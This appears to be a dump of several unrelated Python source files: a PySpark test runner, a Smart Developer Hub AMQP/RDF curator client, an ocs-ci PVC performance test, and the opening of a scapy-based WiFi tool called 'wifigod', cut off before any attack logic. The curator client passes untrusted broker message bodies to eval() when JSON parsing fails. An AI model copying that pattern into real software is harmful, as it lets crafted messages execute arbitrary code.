LOGGER.error("No python3 executable found. Exiting!")
os._exit(1)
else:
python_execs.insert(0, p)
return python_execs
def parse_opts():
parser = ArgumentParser(
prog="run-tests"
)
parser.add_argument(
"--python-executables", type=str, default=','.join(get_default_python_executables()),
help="A comma-separated list of Python executables to test against (default: %(default)s)"
)
parser.add_argument(
"--modules", type=str,
default=",".join(sorted(python_modules.keys())),
help="A comma-separated list of Python modules to test (default: %(default)s)"
)
parser.add_argument(
"-p", "--parallelism", type=int, default=4,
help="The number of suites to test in parallel (default %(default)d)"
)
parser.add_argument(
"--verbose", action="store_true",
help="Enable additional debug logging"
)
group = parser.add_argument_group("Developer Options")
group.add_argument(
"--testnames", type=str,
default=None,
help=(
"A comma-separated list of specific modules, classes and functions of doctest "
"or unittest to test. "
"For example, 'pyspark.sql.foo' to run the module as unittests or doctests, "
"'pyspark.sql.tests FooTests' to run the specific class of unittests, "
"'pyspark.sql.tests FooTests.test_foo' to run the specific unittest in the class. "
"'--modules' option is ignored if they are given.")
)
args, unknown = parser.parse_known_args()
if unknown:
parser.error("Unsupported arguments: %s" % ' '.join(unknown))
if args.parallelism < 1:
parser.error("Parallelism cannot be less than 1")
return args
def _check_coverage(python_exec):
# Make sure if coverage is installed.
try:
subprocess_check_output(
[python_exec, "-c", "import coverage"],
stderr=open(os.devnull, 'w'))
except:
print_red("Coverage is not installed in Python executable '%s' "
"but 'COVERAGE_PROCESS_START' environment variable is set, "
"exiting." % python_exec)
sys.exit(-1)
def main():
opts = parse_opts()
if opts.verbose:
log_level = logging.DEBUG
else:
log_level = logging.INFO
should_test_modules = opts.testnames is None
logging.basicConfig(stream=sys.stdout, level=log_level, format="%(message)s")
LOGGER.info("Running PySpark tests. Output is in %s", LOG_FILE)
if os.path.exists(LOG_FILE):
os.remove(LOG_FILE)
python_execs = opts.python_executables.split(',')
LOGGER.info("Will test against the following Python executables: %s", python_execs)
if should_test_modules:
modules_to_test = []
for module_name in opts.modules.split(','):
if module_name in python_modules:
modules_to_test.append(python_modules[module_name])
else:
print("Error: unrecognized module '%s'. Supported modules: %s" %
(module_name, ", ".join(python_modules)))
sys.exit(-1)
LOGGER.info("Will test the following Python modules: %s", [x.name for x in modules_to_test])
else:
testnames_to_test = opts.testnames.split(',')
LOGGER.info("Will test the following Python tests: %s", testnames_to_test)
task_queue = Queue.PriorityQueue()
for python_exec in python_execs:
# Check if the python executable has coverage installed when 'COVERAGE_PROCESS_START'
# environmental variable is set.
if "COVERAGE_PROCESS_START" in os.environ:
_check_coverage(python_exec)
python_implementation = subprocess_check_output(
[python_exec, "-c", "import platform; print(platform.python_implementation())"],
universal_newlines=True).strip()
LOGGER.debug("%s python_implementation is %s", python_exec, python_implementation)
LOGGER.debug("%s version is: %s", python_exec, subprocess_check_output(
[python_exec, "--version"], stderr=subprocess.STDOUT, universal_newlines=True).strip())
if should_test_modules:
for module in modules_to_test:
if python_implementation not in module.blacklisted_python_implementations:
for test_goal in module.python_test_goals:
heavy_tests = ['pyspark.streaming.tests', 'pyspark.mllib.tests',
'pyspark.tests', 'pyspark.sql.tests', 'pyspark.ml.tests']
if any(map(lambda prefix: test_goal.startswith(prefix), heavy_tests)):
priority = 0
else:
priority = 100
task_queue.put((priority, (python_exec, test_goal)))
else:
for test_goal in testnames_to_test:
task_queue.put((0, (python_exec, test_goal)))
# Create the target directory before starting tasks to avoid races.
target_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'target'))
if not os.path.isdir(target_dir):
os.mkdir(target_dir)
def process_queue(task_queue):
while True:
try:
(priority, (python_exec, test_goal)) = task_queue.get_nowait()
except Queue.Empty:
break
try:
run_individual_python_test(target_dir, test_goal, python_exec)
finally:
task_queue.task_done()
start_time = time.time()
for _ in range(opts.parallelism):
worker = Thread(target=process_queue, args=(task_queue,))
worker.daemon = True
worker.start()
try:
task_queue.join()
except (KeyboardInterrupt, SystemExit):
print_red("Exiting due to interrupt")
sys.exit(-1)
total_duration = time.time() - start_time
LOGGER.info("Tests passed in %i seconds", total_duration)
for key, lines in sorted(SKIPPED_TESTS.items()):
pyspark_python, test_name = key
LOGGER.info("\nSkipped tests in %s with %s:" % (test_name, pyspark_python))
for line in lines:
LOGGER.info(" %s" % line.rstrip())
if __name__ == "__main__":
main()
|
__init__.py
|
"""
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
This file is part of the Smart Developer Hub Project:
http://www.smartdeveloperhub.org
Center for Open Middleware
http://www.centeropenmiddleware.com/
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Copyright (C) 2015 Center for Open Middleware.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
"""
import json
from abc import abstractproperty, ABCMeta
from urlparse import urlparse
from pika.exceptions import ChannelClosed
__author__ = 'Fernando Serena'
import StringIO
import uuid
import logging
import pika
from rdflib import Graph, RDF, Literal, BNode, URIRef
from rdflib.namespace import Namespace, FOAF, XSD
from agora.client.wrapper import Agora
import time
from threading import Thread
from datetime import datetime
log = logging.getLogger('sdh.curator.client')
CURATOR = Namespace('http://www.smartdeveloperhub.org/vocabulary/curator#')
TYPES = Namespace('http://www.smartdeveloperhub.org/vocabulary/types#')
AMQP = Namespace('http://www.smartdeveloperhub.org/vocabulary/amqp#')
class RequestGraph(Graph):
__metaclass__ = ABCMeta
def __init__(self):
super(RequestGraph, self).__init__()
self._request_node = BNode()
self._agent_node = BNode()
self._broker_node = BNode()
self._channel_node = BNode()
self._message_id = self._agent_id = self._submitted_on = self._exchange_name = None
self._routing_key = self._broker_host = self._broker_port = self._broker_vh = None
# Node binding
self.add((self.request_node, CURATOR.replyTo, self.channel_node))
self.add((self.request_node, CURATOR.submittedBy, self.agent_node))
self.add((self.channel_node, RDF.type, CURATOR.DeliveryChannel))
self.add((self.broker_node, RDF.type, AMQP.Broker))
self.add((self.channel_node, AMQP.broker, self.broker_node))
self.add((self.agent_node, RDF.type, FOAF.Agent))
# Default graph
self.message_id = uuid.uuid4()
self.submitted_on = datetime.now()
self.agent_id = uuid.uuid4()
self.exchange_name = ""
self.routing_key = ""
self.broker_host = "localhost"
self.broker_port = 5672
self.broker_vh = "/"
self.bind('curator', CURATOR)
self.bind('amqp', AMQP)
self.bind('foaf', FOAF)
self.bind('types', TYPES)
@property
def request_node(self):
return self._request_node
@property
def broker_node(self):
return self._broker_node
@property
def channel_node(self):
return self._channel_node
@property
def agent_node(self):
return self._agent_node
@property
def message_id(self):
return self._message_id
@abstractproperty
def type(self):
pass
@message_id.setter
def message_id(self, value):
self._message_id = Literal(str(value), datatype=TYPES.UUID)
self.set((self._request_node, CURATOR.messageId, self._message_id))
@property
def agent_id(self):
return self._agent_id
@agent_id.setter
def agent_id(self, value):
self._agent_id = Literal(str(value), datatype=TYPES.UUID)
self.set((self._agent_node, CURATOR.agentId, self._agent_id))
@property
def submitted_on(self):
return self._submitted_on
@submitted_on.setter
def submitted_on(self, value):
self._submitted_on = Literal(value)
self.set((self._request_node, CURATOR.submittedOn, self._submitted_on))
@property
def exchange_name(self):
return self._exchange_name
@exchange_name.setter
def exchange_name(self, value):
self._exchange_name = Literal(value, datatype=TYPES.Name)
self.set((self.channel_node, AMQP.exchangeName, self._exchange_name))
@property
def routing_key(self):
return self._routing_key
@routing_key.setter
def routing_key(self, value):
self._routing_key = Literal(value, datatype=TYPES.Name)
self.set((self.channel_node, AMQP.routingKey, self._routing_key))
@property
def broker_host(self):
return self._broker_host
@broker_host.setter
def broker_host(self, value):
self._broker_host = Literal(value, datatype=TYPES.Hostname)
self.set((self.broker_node, AMQP.host, self._broker_host))
@property
def broker_port(self):
return self._broker_port
@broker_port.setter
def broker_port(self, value):
self._broker_port = Literal(value, datatype=TYPES.Port)
self.set((self.broker_node, AMQP.port, self._broker_port))
@property
def broker_vh(self):
return self._broker_vh
@broker_vh.setter
def broker_vh(self, value):
self._broker_vh = Literal(value, datatype=TYPES.Path)
self.set((self.broker_node, AMQP.virtualHost, self._broker_vh))
def transform(self, elem):
return elem
class FragmentRequestGraph(RequestGraph):
__metaclass__ = ABCMeta
@staticmethod
def __is_variable(elm):
return elm.startswith('?')
def __extend_uri(self, short):
"""
Extend a prefixed uri with the help of a specific dictionary of prefixes
:param short: Prefixed uri to be extended
:return:
"""
if short == 'a':
return RDF.type
for prefix in sorted(self.__prefixes, key=lambda x: len(x), reverse=True):
if short.startswith(prefix):
return URIRef(short.replace(prefix + ':', self.__prefixes[prefix]))
return short
def is_uri(self, uri):
if uri.startswith('<') and uri.endswith('>'):
uri = uri.lstrip('<').rstrip('>')
parse = urlparse(uri, allow_fragments=True)
return bool(len(parse.scheme))
elif ':' in uri:
prefix_parts = uri.split(':')
return len(prefix_parts) == 2 and prefix_parts[0] in self.__prefixes
return uri == 'a'
def __init__(self, *args, **kwargs):
super(FragmentRequestGraph, self).__init__()
if not args:
raise AttributeError('A graph pattern must be provided')
self.__prefixes = kwargs.get('prefixes', None)
if self.__prefixes is None:
raise AttributeError('A prefixes list must be provided')
elements = {}
for tp in args:
s, p, o = tuple(tp.strip().split(' '))
if s not in elements:
if self.__is_variable(s):
elements[s] = BNode(s)
self.set((elements[s], RDF.type, CURATOR.Variable))
self.set((elements[s], CURATOR.label, Literal(s, datatype=XSD.string)))
if p not in elements:
if self.is_uri(p):
elements[p] = self.__extend_uri(p)
if o not in elements:
if self.__is_variable(o):
elements[o] = BNode(o)
self.set((elements[o], RDF.type, CURATOR.Variable))
self.set((elements[o], CURATOR.label, Literal(o, datatype=XSD.string)))
elif self.is_uri(o):
elements[o] = self.__extend_uri(o)
else:
elements[o] = Literal(o)
self.add((elements[s], elements[p], elements[o]))
class StreamRequestGraph(FragmentRequestGraph):
def __init__(self, *args, **kwargs):
super(StreamRequestGraph, self).__init__(*args, **kwargs)
self.add((self.request_node, RDF.type, CURATOR.StreamRequest))
@property
def type(self):
return 'stream'
def transform(self, quad):
def __transform(x):
if type(x) == str or type(x) == unicode:
if self.is_uri(x):
return URIRef(x.lstrip('<').rstrip('>'))
elif '^^' in x:
(value, ty) = tuple(x.split('^^'))
return Literal(value.replace('"', ''), datatype=URIRef(ty.lstrip('<').rstrip('>')))
elif x.startswith('_:'):
return BNode(x.replace('_:', ''))
else:
return Literal(x.replace('"', ''), datatype=XSD.string)
return x
triple = quad[1:]
return tuple([quad[0]] + map(__transform, triple))
class QueryRequestGraph(FragmentRequestGraph):
def __init__(self, *args, **kwargs):
super(QueryRequestGraph, self).__init__(*args, **kwargs)
self.add((self.request_node, RDF.type, CURATOR.QueryRequest))
@property
def type(self):
return 'query'
class CuratorClient(object):
def __init__(self, broker_host='localhost', broker_port=5672, wait=False, monitoring=None, agora_host='localhost',
agora_port=5002, stop_event=None):
self.agora = Agora(host=agora_host, port=agora_port)
self.__connection = pika.BlockingConnection(pika.ConnectionParameters(host=broker_host, port=broker_port))
self.__channel = self.__connection.channel()
self.__listening = False
self.__accept_queue = self.__response_queue = None
self.__monitor = Thread(target=self.__monitor_consume, args=[monitoring]) if monitoring else None
self.__last_consume = datetime.now()
self.__keep_monitoring = True
self.__accepted = False
self.__message = None
self.__wait = wait
self.__stop_event = stop_event
def __monitor_consume(self, t):
log.debug('Curator client monitor started...')
while self.__keep_monitoring:
if (datetime.now() - self.__last_consume).seconds > t:
self.stop()
break
else:
time.sleep(1)
def request(self, message):
self.__response_queue = self.__channel.queue_declare(auto_delete=True).method.queue
message.routing_key = self.__response_queue
self.__message = message
self.__accept_queue = self.__channel.queue_declare(auto_delete=True).method.queue
self.__channel.queue_bind(exchange='sdh', queue=self.__accept_queue,
routing_key='curator.response.{}'.format(str(message.agent_id)))
self.__channel.basic_publish(exchange='sdh',
routing_key='curator.request.{}'.format(self.__message.type),
body=message.serialize(format='turtle'))
log.info('sent {} request!'.format(self.__message.type))
self.__listening = True
return self.agora.prefixes, self.__consume()
def __consume(self):
def __response_callback(properties, body):
if properties.headers.get('state', None) == 'end':
log.info('End of stream received!')
self.stop()
else:
try:
items = json.loads(body)
except ValueError:
items = eval(body)
if not isinstance(items, list):
items = [items]
for item in items:
yield properties.headers, item
log.debug('Waiting for acceptance...')
for message in self.__channel.consume(self.__accept_queue, no_ack=True, inactivity_timeout=1):
if message is not None:
method, properties, body = message
g = Graph()
g.parse(StringIO.StringIO(body), format='turtle')
if len(list(g.subjects(RDF.type, CURATOR.Accepted))) == 1:
log.info('Request accepted!')
self.__accepted = True
else:
log.error('Bad request!')
self.__channel.queue_delete(self.__accept_queue)
self.__channel.cancel()
break
elif self.__stop_event is not None:
if self.__stop_event.isSet():
self.stop()
if not self.__accepted:
log.debug('Request not accepted. Aborting...')
raise StopIteration()
if self.__monitor is not None:
self.__monitor.start()
log.debug('Listening...')
for message in self.__channel.consume(self.__response_queue, no_ack=True, inactivity_timeout=1):
if message is not None:
method, properties, body = message
for headers, item in __response_callback(properties, body):
yield headers, self.__message.transform(item)
elif not self.__wait:
yield None
elif self.__stop_event is not None:
if self.__stop_event.isSet():
self.stop()
raise StopIteration()
else:
log.debug('Inactivity timeout...')
self.__last_consume = datetime.now()
if self.__monitor is not None:
self.__keep_monitoring = False
log.debug('Waiting for client monitor to stop...')
self.__monitor.join()
def stop(self):
try:
self.__channel.queue_delete(self.__accept_queue)
self.__channel.queue_delete(self.__response_queue)
self.__channel.cancel()
self.__channel.close()
self.__listening = False
except ChannelClosed:
pass
log.debug('Stopped curator client!')
@property
def listening(self):
return self.__listening
def get_fragment_generator(*args, **kwargs):
client = CuratorClient(**kwargs)
request = StreamRequestGraph(prefixes=client.agora.prefixes, *args)
request.broker_host = kwargs['broker_host']
return client.request(request)
def get_query_generator(*args, **kwargs):
client = CuratorClient(**kwargs)
request = QueryRequestGraph(prefixes=client.agora.prefixes, *args)
request.broker_host = kwargs['broker_host']
return client.request(request)
|
test_pvc_creation_deletion_performance.py
|
"""
Test to verify performance of PVC creation and deletion
for RBD, CephFS and RBD-Thick interfaces
"""
import time
import logging
import os
import datetime
import pytest
import ocs_ci.ocs.exceptions as ex
import threading
import statistics
from concurrent.futures import ThreadPoolExecutor
from uuid import uuid4
from ocs_ci.framework.testlib import performance
from ocs_ci.ocs.perftests import PASTest
from ocs_ci.helpers import helpers, performance_lib
from ocs_ci.ocs import constants
from ocs_ci.helpers.helpers import get_full_test_logs_path
from ocs_ci.ocs.perfresult import ResultsAnalyse
from ocs_ci.framework import config
log = logging.getLogger(__name__)
@performance
class TestPVCCreationDeletionPerformance(PASTest):
"""
Test to verify performance of PVC creation and deletion
"""
def setup(self):
"""
Setting up test parameters
"""
log.info("Starting the test setup")
super(TestPVCCreationDeletionPerformance, self).setup()
self.benchmark_name = "PVC_Creation-Deletion"
self.uuid = uuid4().hex
self.crd_data = {
"spec": {
"test_user": "Homer simpson",
"clustername": "test_cluster",
"elasticsearch": {
"server": config.PERF.get("production_es_server"),
"port": config.PERF.get("production_es_port"),
"url": f"http://{config.PERF.get('production_es_server')}:{config.PERF.get('production_es_port')}",
},
}
}
if self.dev_mode:
self.crd_data["spec"]["elasticsearch"] = {
"server": config.PERF.get("dev_es_server"),
"port": config.PERF.get("dev_es_port"),
"url": f"http://{config.PERF.get('dev_es_server')}:{config.PERF.get('dev_es_port')}",
}
@pytest.fixture()
def base_setup(self, interface_type, storageclass_factory, pod_factory):
"""
A setup phase for the test
Args:
interface_type: A fixture to iterate over ceph interfaces
storageclass_factory: A fixture to create everything needed for a
storageclass
pod_factory: A fixture to create new pod
"""
self.interface = interface_type
if self.interface == constants.CEPHBLOCKPOOL_THICK:
self.sc_obj = storageclass_factory(
interface=constants.CEPHBLOCKPOOL,
new_rbd_pool=True,
rbd_thick_provision=True,
)
else:
self.sc_obj = storageclass_factory(self.interface)
self.pod_factory = pod_factory
@pytest.fixture()
def namespace(self, project_factory):
"""
Create a new project
"""
proj_obj = project_factory()
self.namespace = proj_obj.namespace
def init_full_results(self, full_results):
"""
Initialize the full results object which will send to the ES server
Args:
full_results (obj): an empty ResultsAnalyse object
Returns:
ResultsAnalyse (obj): the input object fill with data
"""
for key in self.environment:
full_results.add_key(key, self.environment[key])
full_results.add_key("storageclass", self.sc)
full_results.add_key("index", full_results.new_index)
return full_results
@pytest.mark.parametrize(
argnames=["interface_type", "pvc_size"],
argvalues=[
pytest.param(
*[constants.CEPHBLOCKPOOL, "5Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHBLOCKPOOL, "15Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHBLOCKPOOL, "25Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHFILESYSTEM, "5Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHFILESYSTEM, "15Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHFILESYSTEM, "25Gi"],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHBLOCKPOOL_THICK, "5Gi"],
marks=[pytest.mark.performance_extended],
),
pytest.param(
*[constants.CEPHBLOCKPOOL_THICK, "15Gi"],
marks=[pytest.mark.performance_extended],
),
pytest.param(
*[constants.CEPHBLOCKPOOL_THICK, "25Gi"],
marks=[pytest.mark.performance_extended],
),
],
)
@pytest.mark.usefixtures(base_setup.__name__)
def test_pvc_creation_deletion_measurement_performance(
self, teardown_factory, pvc_size
):
"""
Measuring PVC creation and deletion times for pvc samples
Verifying that those times are within the required limits
"""
# Getting the full path for the test logs
self.full_log_path = get_full_test_logs_path(cname=self)
self.results_path = get_full_test_logs_path(cname=self)
if self.interface == constants.CEPHBLOCKPOOL:
self.sc = "RBD"
elif self.interface == constants.CEPHFILESYSTEM:
self.sc = "CephFS"
elif self.interface == constants.CEPHBLOCKPOOL_THICK:
self.sc = "RBD-Thick"
self.full_log_path += f"-{self.sc}-{pvc_size}"
log.info(f"Logs file path name is : {self.full_log_path}")
self.start_time = time.strftime("%Y-%m-%dT%H:%M:%SGMT", time.gmtime())
self.get_env_info()
# Initialize the results doc file.
self.full_results = self.init_full_results(
ResultsAnalyse(
self.uuid,
self.crd_data,
self.full_log_path,
"pvc_create_delete_fullres",
)
)
self.full_results.add_key("pvc_size", pvc_size)
num_of_samples = 5
accepted_creation_time = (
600 if self.interface == constants.CEPHBLOCKPOOL_THICK else 1
)
# accepted deletion time for RBD is 1 sec, for CephFS is 2 secs and for RBD Thick is 5 secs
if self.interface == constants.CEPHFILESYSTEM:
accepted_deletion_time = 2
elif self.interface == constants.CEPHBLOCKPOOL:
accepted_deletion_time = 1
else:
accepted_deletion_time = 5
self.full_results.add_key("samples", num_of_samples)
accepted_creation_deviation_percent = 50
accepted_deletion_deviation_percent = 50
creation_time_measures = []
deletion_time_measures = []
msg_prefix = f"Interface: {self.interface}, PVC size: {pvc_size}."
for i in range(num_of_samples):
logging.info(f"{msg_prefix} Start creating PVC number {i + 1}.")
start_time = datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")
pvc_obj = helpers.create_pvc(sc_name=self.sc_obj.name, size=pvc_size)
timeout = 600 if self.interface == constants.CEPHBLOCKPOOL_THICK else 60
helpers.wait_for_resource_state(
pvc_obj, constants.STATUS_BOUND, timeout=timeout
)
pvc_obj.reload()
creation_time = performance_lib.measure_pvc_creation_time(
self.interface, pvc_obj.name, start_time
)
logging.info(
f"{msg_prefix} PVC number {i + 1} was created in {creation_time} seconds."
)
if creation_time > accepted_creation_time:
raise ex.PerformanceException(
f"{msg_prefix} PVC creation time is {creation_time} and is greater than "
f"{accepted_creation_time} seconds."
)
creation_time_measures.append(creation_time)
pv_name = pvc_obj.backed_pv
pvc_reclaim_policy = pvc_obj.reclaim_policy
pod_obj = self.write_file_on_pvc(pvc_obj)
pod_obj.delete(wait=True)
teardown_factory(pvc_obj)
logging.info(f"{msg_prefix} Start deleting PVC number {i + 1}")
if pvc_reclaim_policy == constants.RECLAIM_POLICY_DELETE:
pvc_obj.delete()
pvc_obj.ocp.wait_for_delete(pvc_obj.name)
helpers.validate_pv_delete(pvc_obj.backed_pv)
deletion_time = helpers.measure_pvc_deletion_time(
self.interface, pv_name
)
logging.info(
f"{msg_prefix} PVC number {i + 1} was deleted in {deletion_time} seconds."
)
if deletion_time > accepted_deletion_time:
raise ex.PerformanceException(
f"{msg_prefix} PVC deletion time is {deletion_time} and is greater than "
f"{accepted_deletion_time} seconds."
)
deletion_time_measures.append(deletion_time)
else:
logging.info(
f"Reclaim policy of the PVC {pvc_obj.name} is not Delete;"
f" therefore not measuring deletion time for this PVC."
)
creation_average = self.process_time_measurements(
"creation",
creation_time_measures,
accepted_creation_deviation_percent,
msg_prefix,
)
self.full_results.add_key("creation-time", creation_average)
deletion_average = self.process_time_measurements(
"deletion",
deletion_time_measures,
accepted_deletion_deviation_percent,
msg_prefix,
)
self.full_results.add_key("deletion-time", deletion_average)
self.full_results.all_results["creation"] = creation_time_measures
self.full_results.all_results["deletion"] = deletion_time_measures
self.end_time = time.strftime("%Y-%m-%dT%H:%M:%SGMT", time.gmtime())
self.full_results.add_key(
"test_time", {"start": self.start_time, "end": self.end_time}
)
if self.full_results.es_write():
res_link = self.full_results.results_link()
log.info(f"The Result can be found at : {res_link}")
# Create text file with results of all subtest (4 - according to the parameters)
self.write_result_to_file(res_link)
def test_pvc_creation_deletion_results(self):
"""
This is not a test - it is only check that previous test ran and finish as expected
and reporting the full results (links in the ES) of previous tests (4)
"""
self.results_path = get_full_test_logs_path(
cname=self, fname="test_pvc_creation_deletion_measurement_performance"
)
self.results_file = os.path.join(self.results_path, "all_results.txt")
log.info(f"Check results in {self.results_file}")
self.number_of_tests = 3
log.info("Check results for 'performance_extended' marker (3 tests)")
try:
self.check_tests_results()
except ex.BenchmarkTestFailed:
log.info("Look like performance_extended was not triggered")
log.info("Check results for 'performance' marker (9 tests)")
self.number_of_tests = 9
self.check_tests_results()
self.push_to_dashboard(test_name="PVC Create-Delete")
def process_time_measurements(
self, action_name, time_measures, accepted_deviation_percent, msg_prefix
):
"""
Analyses the given time measured. If the standard deviation of these times is bigger than the
provided accepted deviation percent, fails the test
Args:
action_name (str): Name of the action for which these measurements were collected; used for the logging
time_measures (list of floats): A list of time measurements
accepted_deviation_percent (int): Accepted deviation percent to which computed standard deviation may be
compared
msg_prefix (str) : A string for comprehensive logging
Returns:
(float) The average value of the provided time measurements
"""
average = statistics.mean(time_measures)
log.info(
f"{msg_prefix} The average {action_name} time for the sampled {len(time_measures)} "
f"PVCs is {average} seconds."
)
if self.interface == constants.CEPHBLOCKPOOL_THICK:
st_deviation = statistics.stdev(time_measures)
st_deviation_percent = st_deviation / average * 100.0
if st_deviation_percent > accepted_deviation_percent:
log.error(
f"{msg_prefix} The standard deviation percent for {action_name} of {len(time_measures)} sampled "
f"PVCs is {st_deviation_percent}% which is bigger than accepted {accepted_deviation_percent}."
)
else:
log.info(
f"{msg_prefix} The standard deviation percent for {action_name} of {len(time_measures)} sampled "
f"PVCs is {st_deviation_percent}% and is within the accepted range."
)
self.full_results.add_key(
f"{action_name}_deviation_pct", st_deviation_percent
)
return average
def write_file_on_pvc(self, pvc_obj, filesize=1):
"""
Writes a file on given PVC
Args:
pvc_obj: PVC object to write a file on
filesize: size of file to write (in GB - default is 1GB)
Returns:
Pod on this pvc on which the file was written
"""
pod_obj = self.pod_factory(
interface=self.interface, pvc=pvc_obj, status=constants.STATUS_RUNNING
)
# filesize to be written is always 1 GB
file_size = f"{int(filesize * 1024)}M"
log.info(f"Starting IO on the POD {pod_obj.name}")
# Going to run only write IO
pod_obj.fillup_fs(size=file_size, fio_filename=f"{pod_obj.name}_file")
# Wait for the fio to finish
fio_result = pod_obj.get_fio_results()
err_count = fio_result.get("jobs")[0].get("error")
assert (
err_count == 0
), f"IO error on pod {pod_obj.name}. FIO result: {fio_result}"
log.info("IO on the PVC has finished")
return pod_obj
@pytest.mark.parametrize(
argnames=["interface_type"],
argvalues=[
pytest.param(
*[constants.CEPHBLOCKPOOL],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHFILESYSTEM],
marks=[pytest.mark.performance],
),
pytest.param(
*[constants.CEPHBLOCKPOOL_THICK],
marks=[pytest.mark.performance_extended],
),
],
)
@pytest.mark.usefixtures(base_setup.__name__)
@pytest.mark.usefixtures(namespace.__name__)
@pytest.mark.polarion_id("OCS-2618")
def test_multiple_pvc_deletion_measurement_performance(self, teardown_factory):
"""
Measuring PVC deletion time of 120 PVCs in 180 seconds
Args:
teardown_factory: A fixture used when we want a new resource that was created during the tests
to be removed in the teardown phase.
Returns:
"""
number_of_pvcs = 120
pvc_size = "1Gi"
msg_prefix = f"Interface: {self.interface}, PVC size: {pvc_size}."
log.info(f"{msg_prefix} Start creating new 120 PVCs")
pvc_objs, _ = helpers.create_multiple_pvcs(
sc_name=self.sc_obj.name,
namespace=self.namespace,
number_of_pvc=number_of_pvcs,
size=pvc_size,
burst=True,
)
for pvc_obj in pvc_objs:
pvc_obj.reload()
teardown_factory(pvc_obj)
timeout = 600 if self.interface == constants.CEPHBLOCKPOOL_THICK else 60
with ThreadPoolExecutor(max_workers=5) as executor:
for pvc_obj in pvc_objs:
executor.submit(
helpers.wait_for_resource_state,
pvc_obj,
constants.STATUS_BOUND,
timeout=timeout,
)
executor.submit(pvc_obj.reload)
pod_objs = []
for pvc_obj in pvc_objs:
pod_obj = self.write_file_on_pvc(pvc_obj, 0.3)
pod_objs.append(pod_obj)
# Get pvc_name, require pvc_name to fetch deletion time data from log
threads = list()
for pvc_obj in pvc_objs:
process = threading.Thread(target=pvc_obj.reload)
process.start()
threads.append(process)
for process in threads:
process.join()
pvc_name_list, pv_name_list = ([] for i in range(2))
threads = list()
for pvc_obj in pvc_objs:
process1 = threading.Thread(target=pvc_name_list.append(pvc_obj.name))
process2 = threading.Thread(target=pv_name_list.append(pvc_obj.backed_pv))
process1.start()
process2.start()
threads.append(process1)
threads.append(process2)
for process in threads:
process.join()
log.info(f"{msg_prefix} Preparing to delete 120 PVC")
# Delete PVC
for pvc_obj, pod_obj in zip(pvc_objs, pod_objs):
pod_obj.delete(wait=True)
pvc_obj.delete()
pvc_obj.ocp.wait_for_delete(pvc_obj.name)
# Get PVC deletion time
pvc_deletion_time = helpers.measure_pv_deletion_time_bulk(
interface=self.interface, pv_name_list=pv_name_list
)
log.info(
f"{msg_prefix} {number_of_pvcs} bulk deletion time is {pvc_deletion_time}"
)
# accepted deletion time is 2 secs for each PVC
accepted_pvc_deletion_time = number_of_pvcs * 2
for del_time in pvc_deletion_time.values():
if del_time > accepted_pvc_deletion_time:
raise ex.PerformanceException(
f"{msg_prefix} {number_of_pvcs} PVCs deletion time is {pvc_deletion_time.values()} and is "
f"greater than {accepted_pvc_deletion_time} seconds"
)
logging.info(f"{msg_prefix} {number_of_pvcs} PVCs deletion times are:")
for name, a_time in pvc_deletion_time.items():
logging.info(f"{name} deletion time is: {a_time} seconds")
|
wifigod.py
|
#!/usr/bin/env python
#coding: utf-8
#Coded and Developed by Blackhole Security
#BlackholeSecurity@protonmail.com
import sys
import multiprocessing
import urllib.request, urllib.parse, urllib.error
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import threading
import requests
import pip
import scapy
import hexdump
import dns
from dns import reversename, resolver
from scapy.all import *
import time
import os
import time
import getpass
import geoip
from geoip import geolite2
import platform
import os
import subprocess
import optparse
parser = optparse.OptionParser()
parser.add_option('-u', '--update', action='store_false', dest='update', help="Check for new updates", default="no_check")
(options,args) = parser.parse_args()
os_type = platform.system()
contact_email = 'BlackholeSecurity@protonmail.com'
if(os_type != "Linux"):
print("Error. This is designed for Linux Operating Systems Only!")
try:
exit(0)
except:
sys.exit(1)
update_version = 0.9
if(options.update != 'no_check'):
if(1 == 1):
r = requests.get('https://raw.githubusercontent.com/blackholesec/wifigod/master/wifigod.py')
f = open('update_check.txt', 'w+')
f.truncate()
f.write(str(r.content).strip())
f.close()
f = open('update_check.txt', 'r')
for line in f:
if('update_version' in line.strip()):
try:
nversion = str(line.strip()).split(' = ')[1]
if(float(nversion) > update_version):
n_update = input("A New Update is Available, Download (y/n): ")
os.remove('update_check.txt')
if(n_update != 'n'):
print("[info]: Updating...")
urllib.request.urlretrieve('https://raw.githubusercontent.com/blackholesec/wifigod/master/wifigod.py', os.getcwd() + '/wifigod.py')
print("[*] Updated.")
try:
exit(0)
except:
sys.exit(1)
except:
pass
if(float(nversion) == update_version):
print("You are all up to date !!")
try:
exit(0)
except:
sys.exit(1)
print(("\n" * 100))
subprocess.call('clear', shell=True)
c_script = ("""
#!/usr/bin/env python3
import shutil
size = shutil.get_terminal_size().columns
print(size)
""")
x = """clear this up"""
#breakline
f = open('columnlib.py', 'w+')
f.write(str(c_script))
f.close()
username = getpass.getuser()
class c:
r = "\033[0;31m"
g = "\033[0;32m"
o = "\033[0;33m"
b = "\033[0;94m"
p = "\033[0;35m"
w = "\033[0;97m"
d = "\033[0;00m"
rb = "\033[01;31m"
gb = "\033[01;32m"
